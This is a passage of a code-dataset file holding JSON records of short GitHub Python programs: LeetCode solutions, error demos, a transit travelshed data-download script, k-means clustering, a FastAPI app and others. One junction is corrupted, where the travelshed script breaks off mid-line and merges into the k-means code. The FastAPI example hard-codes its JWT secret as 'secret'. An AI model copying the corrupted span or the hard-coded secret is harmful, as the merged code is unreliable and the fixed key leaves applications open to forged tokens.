train=True)\n","repo_name":"shh2000/Bigscity-Human-Mobility-Prediction-Toolkit","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"44093242072","text":"class Solution:\n def is_parlidrome(self, l, r, sub_s):\n left = 0\n right = len(sub_s) - 1\n while (left < right):\n if sub_s[left] != sub_s[right]:\n return False\n left += 1\n right -= 1\n return True\n def verison1(self, s):\n s = list(s)\n l = 0\n r = len(s) - 1\n while l < r:\n if s[l] != s[r]:\n break\n l += 1\n r -= 1\n if (l >= r):\n return True\n elif self.is_parlidrome(l + 1, r, s[l + 1 : r + 1]) or self.is_parlidrome(l, r - 1, s[l: r]):\n return True\n return False \n\n def version2(self, s):\n left = 0\n right = len(s) - 1\n \n while left < right:\n if s[left] != s[right]:\n one = s[left:right]\n two = s[left+1:right+1]\n return one == one[::-1] or two == two[::-1]\n left += 1\n right -= 1 \ndef main():\n s = \"abc\"\n print(Solution().verison1(s))\nmain()","repo_name":"Luwei-Lin/LeetCode","sub_path":"LC/Python/LC0680_valid_palindrome.py","file_name":"LC0680_valid_palindrome.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24430557861","text":"#!/usr/bin/env python3\n\n#\n# UnboundLocalError: local variable 'result' referenced before assignment\n#\n# it is happend only inside function/method\n#\n\nimport traceback\n\ndef example1():\n print(result)\n result = 5\n \ndef example2a():\n result += 5\n \ndef example2b():\n result = result + 5\n \ndef example3():\n '''\n - to create variable `result` you have to assign value,\n - to get value you have to calculate `1/0`\n - but it give exception \"division by zero\"\n - so it can't give value which you could use to create variable `result`\n - so it doesn't create variable\n - but later it tries to use it - print it\n - and it gives error \"UnboundLocalError: local variable 'result' referenced before assignment\"\n '''\n \n try:\n result = 1/0\n except Exception as ex:\n print(ex)\n print(result)\n\ndef example4():\n if False:\n result = 5\n print(result)\n\n#----------------------------------------------------------------------\n\nexamples = [example1, example2a, example2b, example3, example4]\n\n\nfor function in examples:\n print('\\n===== Example:', function.__name__, '=====')\n try:\n function()\n #except:\n #except Exception as ex:\n except UnboundLocalError as ex:\n print('\\nException:', ex)\n print('\\n---\\n')\n traceback.print_exc()\n","repo_name":"furas/python-examples","sub_path":"__ERRORS__/UnboundLocalError - local variable referenced before assignment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"79"} +{"seq_id":"42432855781","text":"class RandomizedCollection:\n def __init__(self):\n self.d = collections.defaultdict(set)\n self.v = []\n\n def insert(self, val: int) -> bool:\n self.d[val].add(len(self.v))\n self.v.append(val)\n return True if len(self.d[val]) == 1 else False\n\n def remove(self, val: int) -> bool:\n if not self.d[val]:\n return False\n select_idx = self.d[val].pop()\n repalce_val = self.v[-1]\n repalce_idx = len(self.v) - 1\n self.d[repalce_val].add(select_idx)\n self.d[repalce_val].discard(repalce_idx)\n self.v[select_idx] = repalce_val\n self.v.pop()\n return True\n\n def getRandom(self) -> int:\n return random.choice(self.v)\n","repo_name":"lih627/python-algorithm-templates","sub_path":"LeetCodeSolutions/LeetCode_0381.py","file_name":"LeetCode_0381.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"} +{"seq_id":"13482198846","text":"import unittest\n\n\nclass TestSolution(unittest.TestCase):\n\n def setUp(self) -> None:\n self.solution = Solution()\n\n def test_givenNormal_when_thenSuccess(self):\n panama = \"A man, a plan, a canal: Panama\"\n is_palindrome = self.solution.isPalindrome(panama)\n self.assertTrue(is_palindrome)\n not_palindrome = self.solution.isPalindrome(\"race a car\")\n self.assertFalse(not_palindrome)\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n ans = True\n left, right = 0, len(s) - 1\n while left < right:\n if not s[left].isalnum():\n left += 1\n continue\n if not s[right].isalnum():\n right -= 1\n continue\n if s[left].lower() != s[right].lower():\n ans = False\n break\n # move pointer\n left, right = left + 1, right - 1\n return ans\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zhang-zzf/leetcode","sub_path":"leetcode/editor/cn/125_验证回文串_test.py","file_name":"125_验证回文串_test.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3856101091","text":"# Travelshed Mapping\n# OpenTripPlanner Guide: http://docs.opentripplanner.org/en/latest/\n# OpenTripPlanner API Doc: http://dev.opentripplanner.org/apidoc/1.0.0/index.html\n\nimport urllib\nimport requests\nimport zipfile\nimport io\nimport geopandas as gpd\nimport pandas as pd\nimport shapely\nimport datetime\n\n# Create project folder\ntvsenv='C:/Users/Yijun Ma/Desktop/travelshedrevamp'\notpenv=tvsenv+'/otp12'\nshpenv=tvsenv+'/quadstate'\n\n\n\n# Download OpenTripPlanner jar file\n# Double check the update before downloading: https://repo1.maven.org/maven2/org/opentripplanner/otp/\nurl='https://repo1.maven.org/maven2/org/opentripplanner/otp/1.2.0/otp-1.2.0-shaded.jar'\nurllib.request.urlretrieve(url,otpenv+'/otp-1.2.0-shaded.jar')\n\n\n\n\n\n\n# Download OpenStreetMap pbf file from geofabrik\n# New York\nurl='https://download.geofabrik.de/north-america/us/new-york-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/newyork.osm.pbf')\n# New Jersey\nurl='https://download.geofabrik.de/north-america/us/new-jersey-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/newjersey.osm.pbf')\n# Connecticut\nurl='https://download.geofabrik.de/north-america/us/connecticut-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/connecticut.osm.pbf')\n# Pennsylvania\nurl='https://download.geofabrik.de/north-america/us/pennsylvania-latest.osm.pbf'\nurllib.request.urlretrieve(url,otpenv+'/pennsylvania.osm.pbf')\n\n\n\n# Download GTFS data\n# New York\n# MTA NYCT Subway\nurl='http://web.mta.info/developers/data/nyct/subway/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctsubway.zip')\n# MTA NYCT Bus Bronx\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_bronx.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusbronx.zip')\n# MTA NYCT Bus Brooklyn\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_brooklyn.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusbrooklyn.zip')\n# MTA NYCT Bus Manhattan\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_manhattan.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusmanhattan.zip')\n# MTA NYCT Bus Queens\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_queens.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusqueens.zip')\n# MTA NYCT Bus Staten Island\nurl='http://web.mta.info/developers/data/nyct/bus/google_transit_staten_island.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtanyctbusstatenisland.zip')\n# MTA Bus Company\nurl='http://web.mta.info/developers/data/busco/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtabusco.zip')\n# MTA long Island Railroad\nurl='http://web.mta.info/developers/data/lirr/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtalirr.zip')\n# MTA Metro-North Railroad\nurl='http://web.mta.info/developers/data/mnr/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/mtamnr.zip')\n# Port Authority Trans-Hudson\nurl='http://data.trilliumtransit.com/gtfs/path-nj-us/path-nj-us.zip'\nurllib.request.urlretrieve(url,otpenv+'/path.zip')\n# JFK AirTrain (manually download the 7 April 2015 version and change the calendar)\nprint('https://transitfeeds.com/p/jfk-airtrain/433')\n# NYC DOT Staten Island Ferry\nurl='http://www.nyc.gov/html/dot/downloads/misc/siferry-gtfs.zip'\nurllib.request.urlretrieve(url,otpenv+'/nycdotsiferry.zip')\n# NYC Ferry\nurl='http://nycferry.connexionz.net/rtt/public/utility/gtfs.aspx?google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/nycferry.zip')\n# NY Waterway\nurl='https://s3.amazonaws.com/data.bytemark.co/nywaterway/nywaterway.zip'\nurllib.request.urlretrieve(url,otpenv+'/nywaterway.zip')\n# Seastreak (manually download the file due to certificate issue)\nprint('http://seastreak.com/api/transit/google_transit.zip')\n# NYC Downtown Alliance\nurl='http://mjcaction.com/MJC_GTFS_Public/downtown_nyc_google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/downtownalliance.zip')\n# Nassau Inter-County Express Bus (manually download the file for the most up to date version)\nprint('http://www.nicebus.com/Passenger-Information/App-Developers.aspx')\n# Suffolk County Transit (http://www.suffolkcountyny.gov/Departments/PublicWorks/Transportation/GeneralTransitFeedSpecificationGTFSDetails.aspx)\nurl='http://www.suffolkcountyny.gov/portals/0/publicworks/zip/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/suffolk.zip')\n# Westchester County Bee-Line System (NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/Westchester_County_Bee-Line_System.zip'\nurllib.request.urlretrieve(url,otpenv+'/beeline.zip')\n# TappanZee Express (Rockland TZX; NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/TappanZee_Express.zip'\nurllib.request.urlretrieve(url,otpenv+'/tzx.zip')\n# Ulster County Area Transit (NYS511: https://511ny.org/developers/resources)\nurl='https://s3.amazonaws.com/datatools-nysdot/public/UCAT_Ulster_County_Area_Transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/ucat.zip')\n# Capital District Transportation Authority\nurl='http://www.cdta.org/schedules/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cdta.zip')\n# Rochester-Genesee Regional Transportation Authority (NYS511: https://511ny.org/developers/resources)\nurl='http://scheduledata.rgrta.com/google_transit_merged.zip'\nurllib.request.urlretrieve(url,otpenv+'/rgrta.zip')\n# Niagara Frontier Transportation Authority\nurl='http://www.nfta.com/metro/__googletransit/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/nfta.zip')\n\n# New Jersey\n# New Jersey Transit (manually download the file; need to log in)\nprint('https://www.njtransit.com/mt/mt_servlet.srv?hdnPageAction=MTDevResourceDownloadTo&Category=rail')\nprint('https://www.njtransit.com/mt/mt_servlet.srv?hdnPageAction=MTDevResourceDownloadTo&Category=bus')\n\n# Connecticut\n# Connecticut Transit Hartford-New Haven-New Britain-Waterbury-Meriden\nurl='https://www.cttransit.com/sites/default/files/gtfs/googlect_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cthfnhnbwbmd.zip')\n# Connecticut Transit Stamford\nurl='https://www.cttransit.com/sites/default/files/gtfs/googlestam_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/ctstam.zip')\n# Shore Line East\nurl='http://www.shorelineeast.com/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/sle.zip')\n# 9 Town Transit\nurl='http://data.trilliumtransit.com/gtfs/ninetown-connecticut-us/ninetown-connecticut-us.zip'\nurllib.request.urlretrieve(url,otpenv+'/9town.zip')\n# Norwalk Transit District\nurl='https://www.norwalktransit.com/s/GTFS_Data.zip'\nurllib.request.urlretrieve(url,otpenv+'/norwalk.zip')\n\n# Pennsylvania\n# Port Authority Transit Corporation\nurl='http://www.ridepatco.org/developers/PortAuthorityTransitCorporation.zip'\nurllib.request.urlretrieve(url,otpenv+'/patco.zip')\n# Southeastern Pennsylvania Transportation Authority (manually download the file and separate bus and rail)\nprint('http://www3.septa.org/') # Media=>Developer=>GTFS=>github\n# Monroe County Transit Authority (Pocono Pony)\nurl='https://www.gomcta.com/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/pocono.zip')\n# Rabbit Transit\nurl='http://www.rabbittransit.org/infopoint/gtfs/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/rabbit.zip')\n# Centre County Transit Authority (CATA)\nurl='https://catabus.com/data/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/cata.zip')\n# Port Authority of Allegheny County\nurl='http://www.portauthority.org/GeneralTransitFeed/google_transit.zip'\nurllib.request.urlretrieve(url,otpenv+'/paac.zip')\n# Erie Metropolitan Transit Authority (EMTA) (manually download the file for the most up to date version)\nprint('http://www.ride-the-e.com/wp-content/uploads/2017/09/EMTA_GTFS.zip')\n\n# Rhode Island (manually download the file for the most up to date version)\n# Rhode Island Public Transit Authority (RIPTA)\nprint('https://www.ripta.com/mobile-applications')\n\n# Delaware\n# Delaware Transit Corporation (DART)\nurl='https://dartfirststate.com/information/routes/gtfs_data/dartfirststate_de_us.zip'\nurllib.request.urlretrieve(url,otpenv+'/dart.zip')\n\n# Amtrak (transitland FOIA)\nurl='http://github.com/transitland/gtfs-archives-not-hosted-elsewhere/raw/master/amtrak.zip'\nurllib.request.urlretrieve(url,otpenv+'/amtrak.zip')\n\n# Problematic feeds\n# Centro (NYS511: https://511ny.org/developers/resources)\nprint('https://www.centro.org/CentroGTFS/CentroGTFS.zip')\n# Lehigh and Northampton Transportation Authority (LANTA)\nprint('https://github.com/LANTA-Transportation-Authority/GTFS-data/raw/master/lanta_gtfs_feed.zip')\n\n\n\n# Download Census Block shapefiles and convert to centorids\n# New York\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_36_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/newyorkblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/newyorkblock.zip','r')\nzip_ref.extractall(tvsenv+'/newyorkblock')\nzip_ref.close()\n# New Jersey\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_34_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/newjerseyblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/newjerseyblock.zip','r')\nzip_ref.extractall(tvsenv+'/newjerseyblock')\nzip_ref.close()\n# Connecticut\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_09_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/connecticutblock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/connecticutblock.zip','r')\nzip_ref.extractall(tvsenv+'/connecticutblock')\nzip_ref.close()\n# Pennsylvania\nurl='ftp://ftp2.census.gov/geo/tiger/TIGER2017/TABBLOCK/tl_2017_42_tabblock10.zip'\nurllib.request.urlretrieve(url,tvsenv+'/pennsylvaniablock.zip')\nzip_ref=zipfile.ZipFile(tvsenv+'/pennsylvaniablock.zip','r')\nzip_ref.extractall(tvsenv+'/pennsylvaniablock')\nzip_ref.close()\n# Merge shapefiles\nny=gpd.read_file(tvsenv+'/newyorkblock/tl_2017_36_tabblock10.shp')\nnj=gpd.read_file(tvsenv+'/newjerseyblock/tl_2017_34_tabblock10.shp')\nct=gpd.read_file(tvsenv+'/connecticutblock/tl_2017_09_tabblock10.shp')\npa=gpd.read_file(tvsenv+'/pennsylvaniablock/tl_2017_42_tabblock10.shp')\nbk=gpd.GeoDataFrame()\nbk=bk.append(ny,ignore_index=True)\nbk=bk.append(nj,ignore_index=True)\nbk=bk.append(ct,ignore_index=True)\nbk=bk.append(pa,ignore_index=True)\nbk.to_file(filename=shpenv+'/quadstateblock.shp',driver='ESRI Shapefile') # crs: 4269\nbkpt=bk\nbkpt['LAT']=pd.to_numeric(bkpt['INTPTLAT10'])\nbkpt['LONG']=pd.to_numeric(bkpt['INTPTLON10'])\nbkpt=bkpt[['GEOID10','LAT','LONG']]\nbkpt=gpd.GeoDataFrame(bkpt,crs={'init': 'epsg:4326'},geometry=[shapely.geometry.Point(xy) for xy in zip(bkpt.LONG, bkpt.LAT)])\nbkpt.to_file(filename=shpenv+'/quadstateblockpoint.shp',driver='ESRI Shapefile')\n\n\n\n\n# Set up OpenTripPlanner in cmd\nprint('java -Xmx8G -jar \"'+otpenv+'/otp-1.2.0-shaded.jar\" --build \"'+otpenv+'\" --inMemory --analyst --port 8801 --securePort 8802')\n\n\nprint(datetime.datetime.now())\n# Create travelshed table\n# Set destination\ndestination='40.684913,-73.978065'\n\n# Set typical day\ntypicaldate='2018/06/06'\n\n# Create arrival time list\narrivaltimeinterval=5 # in minutes\narrivaltimestart='07:00:00'\narrivaltimeend='10:00:00'\narrivaltimestart=datetime.datetime.strptime(arrivaltimestart,'%H:%M:%S')\narrivaltimeend=datetime.datetime.strptime(arrivaltimeend,'%H:%M:%S')\narrivaltimeincrement=arrivaltimestart\narrivaltime=[]\nwhile arrivaltimeincrement<=arrivaltimeend:\n arrivaltime.append(datetime.datetime.strftime(arrivaltimeincrement,'%H:%M:%S'))\n arrivaltimeincrement+=datetime.timedelta(seconds=arrivaltimeinterval*60)\n\n# Set maximum number of transfers\nmaxTransfers=3 # 4 boardings\n\n# Set maximum walking distance\nmaxWalkDistance=805 # in meters\n\n# Set maximum pre transit free flow driving time\nmaxPreTransitTime=5 # in minutes\n\n# Set cut off points between 0-120 mins\ncutoffinterval=2 # in minutes\ncutoffstart=0\ncutoffend=120\ncutoffincrement=cutoffstart\ncutoff=''\nwhile cutoffincrement cnvrgPct: \n scatterPrev = self.scatter\n self.Update()\n \n if self.scatter < minScatter:\n minScatter = self.scatter\n minMus = self.mus.copy()\n self.minClusters = self.clstr.copy()\n \n # We return the centroid values re-calculated for the non-normalized data using the final cluster assignments.\n self.finalMus = np.zeros((self.k,self.nDim))\n for ik in range(self.k):\n self.finalMus[ik,:] = self.tbl.loc[self.minClusters.id == ik,:].mean(axis=0) \n \n return (self.finalMus,self.minClusters.id,self.CalcPValues(minMus, self.minClusters))\n \n \n \n # Uses Hotelling's test to determine if the differences between cluster centroids\n # are statistically significant.\n # Reference: https://en.wikipedia.org/wiki/Hotelling%27s_T-squared_distribution#Two-sample_statistic\n def CalcPValues(self,mus,clstr):\n \n nComp = scisp.comb(self.k,2,exact=True) # Number of comparisons between centroids.\n pTable = pd.DataFrame({ \n 'i': [0]*nComp, 'j': [0]*nComp, # Indices to represent the centroids being compared.\n 'pVal': [0]*nComp # p-value indicating statistical significance.\n })\n \n pInd = 0\n p = self.nDim\n for i in range(self.k):\n for j in range(i+1,self.k):\n \n # Number of data samples in cluster groups i and j.\n iN = sum(clstr.id==i) \n jN = sum(clstr.id==j)\n \n # Covariance matrices of the data in the two cluster groups.\n iCov = np.cov(self.dat.loc[clstr.id==i,:],rowvar=False)\n jCov = np.cov(self.dat.loc[clstr.id==j,:],rowvar=False)\n \n # Inverse of the pooled covariance matrix estimate\n invCov = np.linalg.inv( ((iN-1)*iCov+(jN-1)*jCov)/(iN+jN-1) )\n \n # Hotelling's two sample test statistic (analagous to the difference between two normalized means in the t-test).\n t2Val = iN*jN/(iN+jN) * (mus[i,:]-mus[j,:]).T @ invCov @ (mus[i,:]-mus[j,:])\n \n # Hotelling's distribution can be approximated by the f-distribution if scaled as follows.\n # - Important since scipy has a CDF for the f-distribution but not one for the Hotelling's distribution.\n fVal = t2Val * (iN+jN-p-1)/((iN+jN-2)*p)\n \n pTable.loc[pInd,'i'] = i\n pTable.loc[pInd,'j'] = j\n \n # Determine p-val (probability the difference between the two means was due to standard sampling error).\n pTable.loc[pInd,'pVal'] = 1-scist.f.cdf(fVal,p,iN+jN-1-p) \n\n pInd += 1\n \n return pTable\n \n # Visualization routine for the centroids and cluster groups. \n def Visualize(self): \n \n if self.nDim != 2:\n print('ERROR: KMeansCluster::Visualize() only works with 2D data.')\n return\n\n try:\n self.finalMus\n except NameError:\n print('ERROR: Need to call KMeansCluster::Solve() before KMeansCluster::Visualize()')\n return\n else:\n xColIdx = [ True, False ]\n yColIdx = [ False, True ]\n \n for ik in range(self.k):\n rowIdx = (self.minClusters.id == ik) \n plt.plot(self.tbl.loc[rowIdx,xColIdx],self.tbl.loc[rowIdx,yColIdx],'o')\n\n plt.plot(self.finalMus[:,0],self.finalMus[:,1],'ko',markersize = 15)\n plt.show()\n \n \nif __name__ == '__main__':\n \n nDat = 10000\n muOffset = 5\n\n # Two clearly separated Gaussian distributed datasets.\n # - An example of finding two actual clusters of data.\n tbl1 = pd.DataFrame({ 'x': np.random.randn(nDat), 'y': np.random.randn(nDat) })\n tbl1.iloc[::2] += muOffset\n\n clusters = KMeansCluster(2,tbl1)\n (clstrMus,clstrAsgn,pTable) = clusters.Solve(10,0.001)\n \n print('-- Gaussian Example Data --')\n print('Centroids:')\n print(clstrMus)\n print('Hotelling\\'s Test Results:')\n print(pTable)\n print('')\n clusters.Visualize()\n\n\n # A uniformly distributed dataset around a circular area.\n # - An example of finding the Voronoi tesselation for uniform data.\n tbl2 = pd.DataFrame({ 'x': np.random.rand(nDat), 'y': np.random.rand(nDat) })\n tbl2 = tbl2[ np.sqrt(tbl2.x**2 + tbl2.y**2) < 1]\n \n clusters = KMeansCluster(3,tbl2)\n (clstrMus,clstrAsgn,pTable) = clusters.Solve(10,0.001)\n \n print('-- Uniform Example Data --')\n print('Centroids:')\n print(clstrMus)\n print('Hotelling\\'s Test Results:')\n print(pTable)\n print('')\n clusters.Visualize()\n\n \n # Verify the Hotelling's test routine by doing a p-value test for data that really is\n # different based only on sampling error.\n \n clusters.dat = pd.DataFrame({ 'x': np.random.randn(nDat), 'y': np.random.randn(nDat) })\n clusters.k = 2\n randClstr = pd.DataFrame({ 'id': np.random.randint(2,size=nDat) }) # Randomly assign clusters.\n mus = np.array([ \n list(clusters.dat.loc[randClstr.id == 0,:].mean(axis=0)),\n list(clusters.dat.loc[randClstr.id == 1,:].mean(axis=0))\n ])\n \n print('-- Hotelling\\'s Test for Random Sampling Error Only --')\n print('Centroids:')\n print(mus) \n print('Hotelling\\'s Test Results:')\n print(clusters.CalcPValues(mus, randClstr))\n print('Typically we reject any p-value larger than 0.05.')\n \n \n \n \n","repo_name":"ggmessier/data-analytics","sub_path":"pubs/RAPID Tests/KMeansCluster.py","file_name":"KMeansCluster.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42072503309","text":"from utils import Statuses,Logg,ProjectUtils\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import JSONResponse\nfrom fastapi_jwt_auth import AuthJWT\nfrom fastapi_jwt_auth.exceptions import AuthJWTException\nfrom pydantic import BaseModel\nfrom routers import users,views\nfrom fastapi.openapi.utils import get_openapi\n\napp=FastAPI()\nLogg().logSetup()\n\nclass Settings(BaseModel):\n authjwt_secret_key: str = \"secret\"\n\n@AuthJWT.load_config\ndef get_config():\n return Settings()\n\n@app.exception_handler(AuthJWTException)\ndef authjwt_exception_handler(request: Request, exc: AuthJWTException):\n return JSONResponse(\n status_code=exc.status_code,\n content={\"detail\": exc.message}\n )\n \ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Custom title\",\n version=\"2.5.0\",\n description=\"This is a very custom OpenAPI schema\",\n routes=app.routes,\n )\n openapi_schema[\"info\"][\"x-logo\"] = {\n \"url\": \"https://fastapi.tiangolo.com/img/logo-margin/logo-teal.png\"\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n@app.middleware(\"http\")\nasync def log_request(request, call_next):\n response = await call_next(request)\n ProjectUtils.print_log_msg(f'{request.method} {request.url} '+f'Status code: {response.status_code}',logger=\"SERVER\")\n return response\n\napp.include_router(users.router,tags=['users'])\napp.include_router(views.router,tags=['views'])\n\n\n","repo_name":"rayalajeevan/product-catalog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42076352698","text":"from gwe_fishdata import FishData\nimport matplotlib.pyplot as plt\n\nfdata = FishData()\n\nbream = fdata.getSpecies('Bream')\nsmelt = fdata.getSpecies('Smelt')\nbr, bd = fdata.getFeatures(bream, 'Weight', 'Length2')\nsr, sd = fdata.getFeatures(smelt, 'Weight', 'Length2')\nplt.scatter(bd[:,1], bd[:,0])\nplt.scatter(sd[:,1], sd[:,0])\nplt.xlabel('Length')\nplt.ylabel('Weight')\nplt.title('Length & Weight')\nplt.legend(['bream', 'smelt'])\n'''\n\nfor f in fdata.species[1:3]:\n temp = fdata.getSpecies(f)\n tr, td = fdata.getFeatures(temp, 'Weight', 'Length2')\n plt.scatter(td[:,1], td[:,0])\nplt.xlabel('Length')\nplt.ylabel('Weight')\nplt.title('Length & Weight')\nplt.legend(fdata.species[1:3])\n'''\nplt.show()\n","repo_name":"chuncmsTeacher/gwe_basic_ml","sub_path":"00_gwe_scatter_bream_smelt.py","file_name":"00_gwe_scatter_bream_smelt.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25497605536","text":"import espressomd\nimport espressomd.interactions\nimport espressomd.visualization\nimport numpy as np\n\nrequired_features = [\"LENNARD_JONES\"]\nespressomd.assert_features(required_features)\n\nbox_l = 50\nn_part = 200\n\nsystem = espressomd.System(box_l=[box_l] * 3)\nnp.random.seed(seed=42)\n\nsystem.time_step = 0.01\nsystem.cell_system.skin = 0.4\n\nsystem.non_bonded_inter[0, 0].lennard_jones.set_params(\n epsilon=0, sigma=1, cutoff=2, shift=\"auto\")\nsystem.bonded_inter[0] = espressomd.interactions.HarmonicBond(k=0.5, r_0=1.0)\n\nprevious_part = None\nfor i in range(n_part):\n part = system.part.add(pos=np.random.random(3) * system.box_l)\n if previous_part:\n part.add_bond((system.bonded_inter[0], previous_part))\n previous_part = part\n\nvisualizer = espressomd.visualization.openGLLive(\n system, bond_type_radius=[0.3])\n\nsystem.integrator.set_steepest_descent(f_max=10, gamma=50.0,\n max_displacement=0.2)\nsystem.integrator.run(1000)\nsystem.integrator.set_vv()\n\nsystem.thermostat.set_langevin(kT=0.1, gamma=20.0, seed=42)\n\nvisualizer.run(1)\n","repo_name":"espressomd/espresso","sub_path":"samples/visualization_bonded.py","file_name":"visualization_bonded.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"79"} +{"seq_id":"17848138784","text":"from typing import List, Tuple\n\n\ndef parse_input(filename: str) -> List[Tuple[int, int, int]]:\n discs = []\n lines = [line.strip().split() for line in open(filename).readlines()]\n for line in lines:\n disc = (int(line[1][1:]), int(line[3]), int(line[11][:-1]))\n discs.append(disc)\n return discs\n\n\ndef disc_in_position(disc: Tuple[int, int, int], time) -> bool:\n disc_num, positions, position = disc\n return (disc_num + position + time) % positions == 0\n\n\ndef falls_through(discs: List[Tuple[int, int, int]], time: int) -> bool:\n for disc in discs:\n if not disc_in_position(disc, time):\n return False\n return True\n\n\ndef part1(discs: List[Tuple[int, int, int]]) -> int:\n time = 0\n while True:\n time += 1\n if falls_through(discs, time):\n return time\n\n\ndef main():\n discs = parse_input('input/day15.txt')\n print(f'Part 1: {part1(discs)}')\n discs.append((7, 11, 0))\n print(f'Part 2: {part1(discs)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TessFerrandez/AdventOfCode-Python","sub_path":"2016/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"3711169198","text":"def confirm(W,sw,i):\n for j in range(len(sw)):\n if W[i+j]!=sw[j]:\n return False\n return True\n\nfor _ in range(1,11):\n t=int(input())\n sw=[i for i in input()]\n W=[i for i in input()]\n n=0\n for i in range(len(W)-len(sw)+1):\n if W[i]==sw[0]:\n if confirm(W,sw,i):\n n+=1\n print(f'#{t} {n}')\n\n","repo_name":"koreamarin/09.Coding_test","sub_path":"Python/02.SWEA/D3/01213_String.py","file_name":"01213_String.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30757451307","text":"import datetime\nfrom geopy.geocoders import Nominatim\n\nLOC_USER_AGENT = \"Google Maps\"\n\n\nclass Preprocessor:\n ALLOWED_DELIVERY_TYPES = [\n 'Economy registered letter',\n 'Priority registered letter',\n ]\n\n DEFAULT_DELIVERY_TYPE = 'List polecony ekonomiczny'\n\n @staticmethod\n def get_address_coordinates(address: str) -> (float, float):\n try:\n geolocator = Nominatim(user_agent=LOC_USER_AGENT)\n location = geolocator.geocode(address)\n print(address + ' ' + str(location.latitude) + ' ' + str(location.longitude))\n except Exception as e:\n print(e.__str__())\n return None\n\n if location is None:\n return None\n return location.latitude, location.longitude\n\n @staticmethod\n def get_hour_category(dt: datetime.datetime) -> int:\n return dt.hour >= 15\n\n @staticmethod\n def get_delivery_time_hours(sending_dt: datetime.datetime, delivery_dt: datetime.datetime):\n return (delivery_dt - sending_dt).total_seconds() / 3600\n\n @staticmethod\n def get_vehicle_transport_time_hours(location1: str, location2: str) -> int:\n raise NotImplementedError\n\n @staticmethod\n def get_distance(location1: str, location2: str) -> float:\n raise NotImplementedError\n","repo_name":"integratedintegral21/Mail-Delivery","sub_path":"predictor/preproessdata/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} 